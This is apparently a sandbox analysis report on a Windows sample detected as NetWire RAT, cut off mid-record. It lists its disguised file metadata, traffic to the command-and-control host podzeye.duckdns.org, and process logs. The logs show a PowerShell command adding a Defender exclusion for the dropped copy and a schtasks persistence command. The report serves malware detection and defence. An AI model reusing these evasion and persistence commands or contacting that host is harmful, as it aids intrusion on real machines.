                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        Name                                 | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x9afb8         | 0x4f         | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x9c000         | 0x41f0c      | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xde000         | 0xc          | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x9ae80         | 0x1c         | .text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                                        Sections

                                                        Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy        | Characteristics
                                                        .text  | 0x2000          | 0x99010      | 0x99200  | False    | 0.802077487245  | data      | 7.52177326572  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc  | 0x9c000         | 0x41f0c      | 0x42000  | False    | 0.324503580729  | data      | 4.42459351507  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0xde000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        Name          | RVA     | Size    | Type                                                                          | Language | Country
                                                        RT_ICON       | 0x9c130 | 0x417e8 | data                                                                          |          |
                                                        RT_GROUP_ICON | 0xdd918 | 0x14    | data                                                                          |          |
                                                        RT_VERSION    | 0xdd92c | 0x3f4   | data                                                                          |          |
                                                        RT_MANIFEST   | 0xddd20 | 0x1ea   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators   |          |

                                                        Imports

                                                        DLL         | Import
                                                        mscoree.dll | _CorExeMain

                                                        Version Infos

                                                        Description      | Data
                                                        Translation      | 0x0000 0x04b0
                                                        LegalCopyright   | Copyright P4 Tecnologia e Desenvolvimento Humano Ltda. 2006
                                                        Assembly Version | 1.0.0.0
                                                        InternalName     | SoapInteg.exe
                                                        FileVersion      | 1.0.0.0
                                                        CompanyName      | P4 Tecnologia e Desenvolvimento Humano Ltda.
                                                        LegalTrademarks  |
                                                        Comments         |
                                                        ProductName      | CsDO.CodeGenerator
                                                        ProductVersion   | 1.0.0.0
                                                        FileDescription  | CsDO.CodeGenerator
                                                        OriginalFilename | SoapInteg.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        Timestamp                | Protocol | SID | Message                                                            | Source Port | Dest Port | Source IP | Dest IP
                                                        01/14/22-15:55:34.288950 | UDP      | 254 | DNS SPOOF query response with TTL of 1 min. and no authority       | 53          | 65447     | 8.8.8.8   | 192.168.2.5

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp                         | Source Port | Dest Port | Source IP       | Dest IP
                                                        Jan 14, 2022 15:55:34.316488028 CET | 49758       | 6688      | 192.168.2.5     | 109.205.178.244
                                                        Jan 14, 2022 15:55:34.350246906 CET | 6688        | 49758     | 109.205.178.244 | 192.168.2.5
                                                        Jan 14, 2022 15:55:34.350370884 CET | 49758       | 6688      | 192.168.2.5     | 109.205.178.244
                                                        Jan 14, 2022 15:55:34.350713968 CET | 49758       | 6688      | 192.168.2.5     | 109.205.178.244
                                                        Jan 14, 2022 15:55:34.406541109 CET | 6688        | 49758     | 109.205.178.244 | 192.168.2.5
                                                        Jan 14, 2022 15:55:34.412012100 CET | 49758       | 6688      | 192.168.2.5     | 109.205.178.244
                                                        Jan 14, 2022 15:55:34.492788076 CET | 6688        | 49758     | 109.205.178.244 | 192.168.2.5
                                                        Jan 14, 2022 15:56:14.379271984 CET | 6688        | 49758     | 109.205.178.244 | 192.168.2.5
                                                        Jan 14, 2022 15:56:14.379663944 CET | 49758       | 6688      | 192.168.2.5     | 109.205.178.244
                                                        Jan 14, 2022 15:56:14.458499908 CET | 6688        | 49758     | 109.205.178.244 | 192.168.2.5
                                                        Jan 14, 2022 15:57:14.727015972 CET | 6688        | 49758     | 109.205.178.244 | 192.168.2.5
                                                        Jan 14, 2022 15:57:14.727893114 CET | 49758       | 6688      | 192.168.2.5     | 109.205.178.244
                                                        Jan 14, 2022 15:57:14.808500051 CET | 6688        | 49758     | 109.205.178.244 | 192.168.2.5

                                                        UDP Packets

                                                        Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                                                        Jan 14, 2022 15:55:34.180125952 CET | 65447       | 53        | 192.168.2.5 | 8.8.8.8
                                                        Jan 14, 2022 15:55:34.288949966 CET | 53          | 65447     | 8.8.8.8     | 192.168.2.5

                                                        DNS Queries

                                                        Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                | Type           | Class
                                                        Jan 14, 2022 15:55:34.180125952 CET | 192.168.2.5 | 8.8.8.8 | 0xfa76   | Standard query (0) | podzeye.duckdns.org | A (IP address) | IN (0x0001)

                                                        DNS Answers

                                                        Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                | CName | Address         | Type           | Class
                                                        Jan 14, 2022 15:55:34.288949966 CET | 8.8.8.8   | 192.168.2.5 | 0xfa76   | No error (0) | podzeye.duckdns.org |       | 109.205.178.244 | A (IP address) | IN (0x0001)

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Memory Usage

                                                        High Level Behavior Distribution

                                                        Behavior

                                                        System Behavior

                                                        General

                                                        Start time:15:55:13
                                                        Start date:14/01/2022
                                                        Path:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\g94e4BgSRN.exe"
                                                        Imagebase:0x270000
                                                        File size:898560 bytes
                                                        MD5 hash:D058C6416284F291D6BC7E183293DA1F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:15:55:23
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
                                                        Imagebase:0x380000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:15:55:24
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7ecfc0000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:15:55:24
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
                                                        Imagebase:0xb0000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:15:55:25
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff797770000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:15:55:26
                                                        Start date:14/01/2022
                                                        Path:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        Imagebase:0xbd0000
                                                        File size:898560 bytes
                                                        MD5 hash:D058C6416284F291D6BC7E183293DA1F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.280983052.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.281635680.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.283998783.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.279964505.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Disassembly

                                                        Code Analysis

                                                          Execution Graph

                                                          Execution Coverage:10.3%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:223
                                                          Total number of Limit Nodes:20

                                                          Graph

                                                          [Execution graph: interactive node/edge dump of the injected payload (image base 0xb60000 region and 0x55f0000 region) not reproduced here. Win32 APIs reached by graph nodes: CreateActCtxA, GetModuleHandleW, LoadLibraryExW, CreateWindowExW, SetWindowLongW, CallWindowProcW, DuplicateHandle.]

                                                          Executed Functions

                                                          Control-flow Graph
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 65520abc8c3dbe3a749963d95e90058d059f038280f77f70d4f5ee990fde0cfb
                                                          • Instruction ID: 6ca2badef67e42369edb2d1fa78a195a0ce2469c243e2c427c33e56d64304176
                                                          • Opcode Fuzzy Hash: 65520abc8c3dbe3a749963d95e90058d059f038280f77f70d4f5ee990fde0cfb
                                                          • Instruction Fuzzy Hash: 62713570A00B058FDB24DF6AD54479ABBF9FF88304F00896AD44AD7A50DB39E849CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055F08E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 662600f86597b8c4615131267a3af1749b5dd79daa7d446b12a51e1ed6c2968f
                                                          • Instruction ID: a462b454b939f8421ed69602478ef2f9ac6cb9e4d507383d8d47976c1abf7f8d
                                                          • Opcode Fuzzy Hash: 662600f86597b8c4615131267a3af1749b5dd79daa7d446b12a51e1ed6c2968f
                                                          • Instruction Fuzzy Hash: 1D51E0B1D103099FDF14CF99C984ADEBBB5FF48310F24812AE919AB250D770A945CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055F08E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: e5287749aee98331985fecc58f9896af9e7cb3d3b035edf3f51fef035b5b89f4
                                                          • Instruction ID: e78ee353c2fba66b6b21d68878a3d8846bff62feeb28562e9bd4b8b366d7fe6d
                                                          • Opcode Fuzzy Hash: e5287749aee98331985fecc58f9896af9e7cb3d3b035edf3f51fef035b5b89f4
                                                          • Instruction Fuzzy Hash: 1141C0B1D103099FDF14CFA9C984ADEBBB5BF48314F24812AE919AB250D7749845CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00B65429
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: f8ff0d85504e1e3d36a23cb150bd7ce86f3ccba9dcc5a5400b3954aee8740e51
                                                          • Instruction ID: a2a812304fcd68bf86074c5700593f0e6b5bbbef046e46489a9cbda3e0552a6b
                                                          • Opcode Fuzzy Hash: f8ff0d85504e1e3d36a23cb150bd7ce86f3ccba9dcc5a5400b3954aee8740e51
                                                          • Instruction Fuzzy Hash: 24412271C00619CBDB24CFA9C8847CEBBF5BF88308F2084A9D409AB251DB756946CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00B65429
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: c512f23a5e73ae7debbd27a6ddb289bad743f0a32797d552bcb03e1eb5f1029d
                                                          • Instruction ID: 5396a31d7192290822f6d9d9d016d555d4689cd633c772477098a11db7bf058c
                                                          • Opcode Fuzzy Hash: c512f23a5e73ae7debbd27a6ddb289bad743f0a32797d552bcb03e1eb5f1029d
                                                          • Instruction Fuzzy Hash: 75410171C0061DCBDB24CFA9C8887DEBBB5FF48308F2084A9D409AB255DB756986CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 055F2E51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 5c1293f957231eb28461ba62c718e7b65d4cfc3d4821d2d7fa9c45e5cf0490c8
                                                          • Instruction ID: af78ac4bf69c56b50e2a9e94c6c31172970017d1e96e217f6992bd10b2261fbc
                                                          • Opcode Fuzzy Hash: 5c1293f957231eb28461ba62c718e7b65d4cfc3d4821d2d7fa9c45e5cf0490c8
                                                          • Instruction Fuzzy Hash: 60414CB8900705DFDB14CF99C888AAABBF5FF88314F24C459D619AB361D734A845CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6C196,?,?,?,?,?), ref: 00B6C257
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 5594f4b322f72dd294ddeaf2144d3cdbe59c77855ebadfffd0f1b923ab5f5b76
                                                          • Instruction ID: 8b0edff57226f7e9bca7fa42e2d0dc659c06eddce3ca4526cf94e8dd15d9ae41
                                                          • Opcode Fuzzy Hash: 5594f4b322f72dd294ddeaf2144d3cdbe59c77855ebadfffd0f1b923ab5f5b76
                                                          • Instruction Fuzzy Hash: 4421E5B5900208AFDB10CF99D984AEEBBF8EB48314F14845AE955B7350D378A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6C196,?,?,?,?,?), ref: 00B6C257
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: c1eb756c2cffedd8bf62966653ffa3db88fa7512bd5ccd4171a5365b22b88ce0
                                                          • Instruction ID: e819815d6b3f039e40cf902c2d8bdb52f02ae28833c715b3fd2ce8c988fc4d1e
                                                          • Opcode Fuzzy Hash: c1eb756c2cffedd8bf62966653ffa3db88fa7512bd5ccd4171a5365b22b88ce0
                                                          • Instruction Fuzzy Hash: 4E2105B59002089FDB00CF99D984ADEBFF9EB48310F14841AE918A7350C378A945CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69F71,00000800,00000000,00000000), ref: 00B6A182
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 768034b57849c8ba2d58b410f9551d33498f317e2db007aa3cf415ae3174c27a
                                                          • Instruction ID: 114743474dc4d80f55dac72347200a2223d2914fab6759219c5d3bfc34532198
                                                          • Opcode Fuzzy Hash: 768034b57849c8ba2d58b410f9551d33498f317e2db007aa3cf415ae3174c27a
                                                          • Instruction Fuzzy Hash: 441103B69002089FDB10CF9AC848ADEFBF8EB49314F14846AD919B7210C779A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69F71,00000800,00000000,00000000), ref: 00B6A182
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 92b74e6af3b3797a7058b64b34fefd80548fe44c0c23fce0a354b34579b77edf
                                                          • Instruction ID: f5e19de9841b58f7eb09c106bf701e8926a55057110f6395d7d7fab860cad572
                                                          • Opcode Fuzzy Hash: 92b74e6af3b3797a7058b64b34fefd80548fe44c0c23fce0a354b34579b77edf
                                                          • Instruction Fuzzy Hash: EB1114B6D002089FDB10CF9AD844BDEFBF8EB99314F14842AD919B7210C779A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00B69CC3), ref: 00B69EF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: bb729b1ec97ff90f27532113e19d915620ecc8e07b37336d978a6464ffb2e855
                                                          • Instruction ID: 7d0d0c3e64e3519b24ea4dfc668dd103bd82e9046223ed4df496d7c0856737ed
                                                          • Opcode Fuzzy Hash: bb729b1ec97ff90f27532113e19d915620ecc8e07b37336d978a6464ffb2e855
                                                          • Instruction Fuzzy Hash: 2E11F3B6D006498BDB10CF9AC844BDEBBF8EB49314F14846AD819B7610C379A549CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • SetWindowLongW.USER32(?,?,?), ref: 055F0A75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID:
                                                          • API String ID: 1378638983-0
                                                          • Opcode ID: fb5b95055b4c6b9810861ebf47107bffdcd39f4d08f85a28c85674e208caff0d
                                                          • Instruction ID: 2f0212dd4b45942a8ccbf5ed5a848a23f4a179b283eed0494ea9943f9056c321
                                                          • Opcode Fuzzy Hash: fb5b95055b4c6b9810861ebf47107bffdcd39f4d08f85a28c85674e208caff0d
                                                          • Instruction Fuzzy Hash: C01100B58002089FDB10CF99C988BEEBBF8FB48324F14841AD955A3750C374A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ac1b5565beb09a7e71f549c6c88f35ca7be6d1a8fe34b36811aeaed9e3cd55b
                                                          • Instruction ID: 1216c853d1f888202d51ef205066bae34becc223263f9b634514a4009de66892
                                                          • Opcode Fuzzy Hash: 0ac1b5565beb09a7e71f549c6c88f35ca7be6d1a8fe34b36811aeaed9e3cd55b
                                                          • Instruction Fuzzy Hash: C521A1715483809FDB02CF60D994752BFB1EF46324F28C1EAC8458F2A6C33AD84ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c87597c7ce232a8ba5166cc53f6e24082543c7c0c47f16e5a45fc5c63a8b190a
                                                          • Instruction ID: 1caadb37bfc68c1e1599bd1d6e2512c8bd38eee9c7eb8be36081c71a3c8e720d
                                                          • Opcode Fuzzy Hash: c87597c7ce232a8ba5166cc53f6e24082543c7c0c47f16e5a45fc5c63a8b190a
                                                          • Instruction Fuzzy Hash: CA212571500248EFDB12DF94D9C0B36BF66FB88328F24C969E9050B246C336D856DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cbbd332750f856d99d85839cced3589be90fc32565a791443b5b7a38979db22
                                                          • Instruction ID: 4ca08fb54116c2b678137c50ab8d3d6991355346c26a9ae5d4cb1db22f79dc28
                                                          • Opcode Fuzzy Hash: 4cbbd332750f856d99d85839cced3589be90fc32565a791443b5b7a38979db22
                                                          • Instruction Fuzzy Hash: F021F275604244EFDB01DF94D9C4B26BFA5FB84324F24C9A9E8494B2C2C736D856CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4955f5fb73b844a9fc8e72516524ed768051ba5120bde31374d91c7d161e265
                                                          • Instruction ID: 971a58c600b122a2dd7b5f863ef39a3124616a2ff1fbb086f8154ee8a748c1a0
                                                          • Opcode Fuzzy Hash: f4955f5fb73b844a9fc8e72516524ed768051ba5120bde31374d91c7d161e265
                                                          • Instruction Fuzzy Hash: C3210071504204EFDB00DF94D9C4B26BFA5FB84324F20C9A9D8091B2D6CB3AD806CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99a32a7d7d1cfcf1930da1b599531ed67ae132be6af7876455120805dc7659c7
